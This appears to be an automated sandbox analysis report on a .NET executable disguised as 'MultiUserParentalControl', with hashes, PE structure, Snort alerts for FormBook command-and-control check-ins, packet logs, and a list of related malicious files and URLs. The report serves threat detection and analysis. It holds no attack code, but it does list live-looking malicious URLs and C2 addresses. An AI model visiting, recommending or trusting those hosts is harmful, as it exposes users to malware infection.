LEASEWEB-NL-AMS-01NetherlandsNL	5DY3NrVgpI.exe	Get hash	malicious	Browse	37.48.65.149
	anydesk (1).exe	Get hash	malicious	Browse	178.162.151.213
	T0pH7Bimeq.exe	Get hash	malicious	Browse	37.48.65.151
	c6Rg7xug26.exe	Get hash	malicious	Browse	212.32.237.101
	parler.apk	Get hash	malicious	Browse	37.48.77.180
	parler.apk	Get hash	malicious	Browse	37.48.77.162
	Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtf	Get hash	malicious	Browse	5.79.72.163
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	178.162.133.149
	http://ovd.ru/forum/register.php?a=act&u=84666&i=25545989	Get hash	malicious	Browse	95.211.66.35
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	5.79.68.108
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	178.162.133.149
	Nuevo pedido.exe	Get hash	malicious	Browse	95.211.223.14
	http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20=	Get hash	malicious	Browse	37.48.65.182
	Nuevo pedido.exe	Get hash	malicious	Browse	95.211.223.14
	https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQ	Get hash	malicious	Browse	213.227.135.213
	http://p5fcw.info/HI12cu33F5	Get hash	malicious	Browse	212.7.204.100
	https://www.hostingcloud.racing/ab20.js	Get hash	malicious	Browse	81.171.8.143
	https://00000000.rdtk.io/5fea58f1588f49000120c69f?thru=thru2	Get hash	malicious	Browse	212.7.204.100
	http://p4fxv.info/D3c2Hp2HMI	Get hash	malicious	Browse	212.7.204.100
	http://p4fxv.info/D3c2Hp2HMI	Get hash	malicious	Browse	212.7.204.100

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvGnm93rap.exe.log Download File
Process:	C:\Users\user\Desktop\YvGnm93rap.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.45747026727835
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	YvGnm93rap.exe
File size:	654336
MD5:	16e1a5d26c0698ac48d63661264e0ba1
SHA1:	5e61d05157c4aa1acfc6a89de619f6bbcad176f6
SHA256:	e4e84d03d4cb709d737f9ee3e69b40d797e452d83faa35f0a06bb78a87ad0984
SHA512:	2b2e106e5bb198bfa88469a7c4b7b72c93e0c91e8037128033df25075c02855f9c0b4e97748cc9fb317c32ad19e3930e4274cf806ed7b7aea377734adb4d9d4e
SSDEEP:	12288:Ig/VMGS1XrEbWp+7jAKVBAIYyPNmvq6xnhpTn3SQs/wRDNvcY:3V81XIKp+7jAIBXqzxnn3SQCwRDF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<v................0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	0000000000000000

Static PE Info

General
Entrypoint:	0x49078e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x87A8763C [Fri Feb 14 04:21:16 2042 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9073c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x10e9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x90720	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8e794	0x8e800	False	0.911773574561	data	7.87823365772	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0x10e9c	0x11000	False	0.0750086167279	data	0.97831783192	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa4000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x92130	0x10828	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0xa2958	0x14	data
RT_VERSION	0xa296c	0x344	data
RT_MANIFEST	0xa2cb0	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	I.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	MultiUserParentalControl
ProductVersion	1.0.0.0
FileDescription	MultiUserParentalControl
OriginalFilename	I.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-20:48:24.834046	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.3	34.102.136.180
01/13/21-20:48:24.834046	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.3	34.102.136.180
01/13/21-20:48:24.834046	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.3	34.102.136.180
01/13/21-20:48:24.972837	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49729	34.102.136.180	192.168.2.3
01/13/21-20:48:56.452844	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	34.102.136.180
01/13/21-20:48:56.452844	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	34.102.136.180
01/13/21-20:48:56.452844	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	34.102.136.180
01/13/21-20:48:56.592288	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49742	34.102.136.180	192.168.2.3
01/13/21-20:49:33.772040	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49747	34.102.136.180	192.168.2.3
01/13/21-20:49:52.606588	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	34.102.136.180
01/13/21-20:49:52.606588	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	34.102.136.180
01/13/21-20:49:52.606588	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	34.102.136.180
01/13/21-20:49:52.745198	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49749	34.102.136.180	192.168.2.3
01/13/21-20:50:26.900142	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49763	80	192.168.2.3	34.102.136.180
01/13/21-20:50:26.900142	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49763	80	192.168.2.3	34.102.136.180
01/13/21-20:50:26.900142	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49763	80	192.168.2.3	34.102.136.180
01/13/21-20:50:27.039673	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49763	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:48:16.321661949 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:16.507045984 CET	80	49728	184.168.131.241	192.168.2.3
Jan 13, 2021 20:48:16.509676933 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:19.321662903 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:19.504669905 CET	80	49728	184.168.131.241	192.168.2.3
Jan 13, 2021 20:48:19.504873037 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:19.505085945 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:19.687851906 CET	80	49728	184.168.131.241	192.168.2.3
Jan 13, 2021 20:48:19.726598978 CET	80	49728	184.168.131.241	192.168.2.3
Jan 13, 2021 20:48:19.726627111 CET	80	49728	184.168.131.241	192.168.2.3
Jan 13, 2021 20:48:19.726881981 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:19.726911068 CET	49728	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:48:19.912086964 CET	80	49728	184.168.131.241	192.168.2.3
Jan 13, 2021 20:48:24.793709993 CET	49729	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:24.833543062 CET	80	49729	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:24.833862066 CET	49729	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:24.834045887 CET	49729	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:24.873786926 CET	80	49729	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:24.972836971 CET	80	49729	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:24.972860098 CET	80	49729	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:24.973002911 CET	49729	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:24.973104000 CET	49729	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:25.013106108 CET	80	49729	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:30.072020054 CET	49731	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:48:30.122785091 CET	80	49731	37.48.65.150	192.168.2.3
Jan 13, 2021 20:48:30.122970104 CET	49731	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:48:30.123297930 CET	49731	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:48:30.173950911 CET	80	49731	37.48.65.150	192.168.2.3
Jan 13, 2021 20:48:30.411103010 CET	80	49731	37.48.65.150	192.168.2.3
Jan 13, 2021 20:48:30.411618948 CET	49731	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:48:30.411705017 CET	80	49731	37.48.65.150	192.168.2.3
Jan 13, 2021 20:48:30.411809921 CET	49731	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:48:30.462523937 CET	80	49731	37.48.65.150	192.168.2.3
Jan 13, 2021 20:48:45.834404945 CET	49740	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:48:45.960352898 CET	80	49740	54.208.77.124	192.168.2.3
Jan 13, 2021 20:48:45.960441113 CET	49740	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:48:45.960675955 CET	49740	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:48:46.088377953 CET	80	49740	54.208.77.124	192.168.2.3
Jan 13, 2021 20:48:46.088632107 CET	49740	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:48:46.088660955 CET	49740	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:48:46.214675903 CET	80	49740	54.208.77.124	192.168.2.3
Jan 13, 2021 20:48:51.205455065 CET	49741	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:48:51.270143986 CET	80	49741	135.181.31.212	192.168.2.3
Jan 13, 2021 20:48:51.270278931 CET	49741	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:48:51.270602942 CET	49741	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:48:51.335372925 CET	80	49741	135.181.31.212	192.168.2.3
Jan 13, 2021 20:48:51.336184025 CET	80	49741	135.181.31.212	192.168.2.3
Jan 13, 2021 20:48:51.336205006 CET	80	49741	135.181.31.212	192.168.2.3
Jan 13, 2021 20:48:51.336220026 CET	80	49741	135.181.31.212	192.168.2.3
Jan 13, 2021 20:48:51.336554050 CET	49741	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:48:51.336566925 CET	49741	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:48:51.401350021 CET	80	49741	135.181.31.212	192.168.2.3
Jan 13, 2021 20:48:56.412378073 CET	49742	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:56.452491045 CET	80	49742	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:56.452590942 CET	49742	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:56.452843904 CET	49742	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:56.492774963 CET	80	49742	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:56.592288017 CET	80	49742	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:56.592327118 CET	80	49742	34.102.136.180	192.168.2.3
Jan 13, 2021 20:48:56.592566967 CET	49742	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:56.592669010 CET	49742	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:48:56.632766962 CET	80	49742	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:01.842854977 CET	49743	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:49:02.043056011 CET	80	49743	104.233.238.207	192.168.2.3
Jan 13, 2021 20:49:02.043153048 CET	49743	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:49:02.043426037 CET	49743	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:49:02.244457006 CET	80	49743	104.233.238.207	192.168.2.3
Jan 13, 2021 20:49:02.244515896 CET	80	49743	104.233.238.207	192.168.2.3
Jan 13, 2021 20:49:02.244632959 CET	49743	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:49:02.444785118 CET	80	49743	104.233.238.207	192.168.2.3
Jan 13, 2021 20:49:02.445784092 CET	49743	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:49:02.445930958 CET	49743	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:49:02.645844936 CET	80	49743	104.233.238.207	192.168.2.3
Jan 13, 2021 20:49:07.568334103 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:07.642817974 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:07.642911911 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:07.643075943 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:07.717680931 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:08.154499054 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:08.269041061 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570158958 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570198059 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570224047 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570242882 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570260048 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570275068 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570290089 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570305109 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570384026 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570389032 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:09.570430994 CET	80	49744	195.78.66.137	192.168.2.3
Jan 13, 2021 20:49:09.570456982 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:09.570513964 CET	49744	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:49:33.592503071 CET	49747	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:33.632606030 CET	80	49747	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:33.632725000 CET	49747	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:33.632935047 CET	49747	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:33.672928095 CET	80	49747	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:33.772039890 CET	80	49747	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:33.772070885 CET	80	49747	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:33.772285938 CET	49747	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:33.772381067 CET	49747	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:33.812395096 CET	80	49747	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:44.110713959 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:44.298120975 CET	80	49748	184.168.131.241	192.168.2.3
Jan 13, 2021 20:49:44.299730062 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:47.125816107 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:47.311358929 CET	80	49748	184.168.131.241	192.168.2.3
Jan 13, 2021 20:49:47.313617945 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:47.313764095 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:47.499008894 CET	80	49748	184.168.131.241	192.168.2.3
Jan 13, 2021 20:49:47.551704884 CET	80	49748	184.168.131.241	192.168.2.3
Jan 13, 2021 20:49:47.551731110 CET	80	49748	184.168.131.241	192.168.2.3
Jan 13, 2021 20:49:47.554639101 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:47.554744005 CET	49748	80	192.168.2.3	184.168.131.241
Jan 13, 2021 20:49:47.739984989 CET	80	49748	184.168.131.241	192.168.2.3
Jan 13, 2021 20:49:52.564388990 CET	49749	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:52.604350090 CET	80	49749	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:52.606374979 CET	49749	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:52.606587887 CET	49749	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:52.646368980 CET	80	49749	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:52.745198011 CET	80	49749	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:52.745233059 CET	80	49749	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:52.746079922 CET	49749	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:52.746172905 CET	49749	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:49:52.786007881 CET	80	49749	34.102.136.180	192.168.2.3
Jan 13, 2021 20:49:57.752118111 CET	49750	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:49:57.804317951 CET	80	49750	37.48.65.150	192.168.2.3
Jan 13, 2021 20:49:57.804486990 CET	49750	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:49:57.804774046 CET	49750	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:49:57.856669903 CET	80	49750	37.48.65.150	192.168.2.3
Jan 13, 2021 20:49:57.975606918 CET	80	49750	37.48.65.150	192.168.2.3
Jan 13, 2021 20:49:57.975907087 CET	80	49750	37.48.65.150	192.168.2.3
Jan 13, 2021 20:49:57.976078987 CET	49750	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:49:57.976145029 CET	49750	80	192.168.2.3	37.48.65.150
Jan 13, 2021 20:49:58.027998924 CET	80	49750	37.48.65.150	192.168.2.3
Jan 13, 2021 20:50:13.330104113 CET	49757	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:50:13.456058025 CET	80	49757	54.208.77.124	192.168.2.3
Jan 13, 2021 20:50:13.457329035 CET	49757	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:50:13.457475901 CET	49757	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:50:13.585222960 CET	80	49757	54.208.77.124	192.168.2.3
Jan 13, 2021 20:50:13.585628033 CET	49757	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:50:13.585678101 CET	49757	80	192.168.2.3	54.208.77.124
Jan 13, 2021 20:50:13.711591005 CET	80	49757	54.208.77.124	192.168.2.3
Jan 13, 2021 20:50:18.594126940 CET	49762	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:50:18.658001900 CET	80	49762	135.181.31.212	192.168.2.3
Jan 13, 2021 20:50:18.658318996 CET	49762	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:50:18.658442020 CET	49762	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:50:18.721961975 CET	80	49762	135.181.31.212	192.168.2.3
Jan 13, 2021 20:50:18.722733021 CET	80	49762	135.181.31.212	192.168.2.3
Jan 13, 2021 20:50:18.722768068 CET	80	49762	135.181.31.212	192.168.2.3
Jan 13, 2021 20:50:18.722784996 CET	80	49762	135.181.31.212	192.168.2.3
Jan 13, 2021 20:50:18.723006010 CET	49762	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:50:18.723045111 CET	49762	80	192.168.2.3	135.181.31.212
Jan 13, 2021 20:50:18.786726952 CET	80	49762	135.181.31.212	192.168.2.3
Jan 13, 2021 20:50:23.734743118 CET	49763	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:50:26.859750032 CET	49763	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:50:26.899977922 CET	80	49763	34.102.136.180	192.168.2.3
Jan 13, 2021 20:50:26.900106907 CET	49763	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:50:26.900141954 CET	49763	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:50:26.940382957 CET	80	49763	34.102.136.180	192.168.2.3
Jan 13, 2021 20:50:27.039673090 CET	80	49763	34.102.136.180	192.168.2.3
Jan 13, 2021 20:50:27.039722919 CET	80	49763	34.102.136.180	192.168.2.3
Jan 13, 2021 20:50:27.039989948 CET	49763	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:50:27.040021896 CET	49763	80	192.168.2.3	34.102.136.180
Jan 13, 2021 20:50:27.080809116 CET	80	49763	34.102.136.180	192.168.2.3
Jan 13, 2021 20:50:32.047955990 CET	49764	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:50:32.248936892 CET	80	49764	104.233.238.207	192.168.2.3
Jan 13, 2021 20:50:32.249047995 CET	49764	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:50:32.249113083 CET	49764	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:50:32.450179100 CET	80	49764	104.233.238.207	192.168.2.3
Jan 13, 2021 20:50:32.450212002 CET	80	49764	104.233.238.207	192.168.2.3
Jan 13, 2021 20:50:32.450319052 CET	49764	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:50:32.651068926 CET	80	49764	104.233.238.207	192.168.2.3
Jan 13, 2021 20:50:32.653474092 CET	49764	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:50:32.657424927 CET	49764	80	192.168.2.3	104.233.238.207
Jan 13, 2021 20:50:32.858084917 CET	80	49764	104.233.238.207	192.168.2.3
Jan 13, 2021 20:50:37.657805920 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:37.732691050 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:37.732796907 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:37.732845068 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:37.807436943 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.220130920 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:38.267407894 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267442942 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267462015 CET	80	49765	195.78.66.137	192.168.2.3
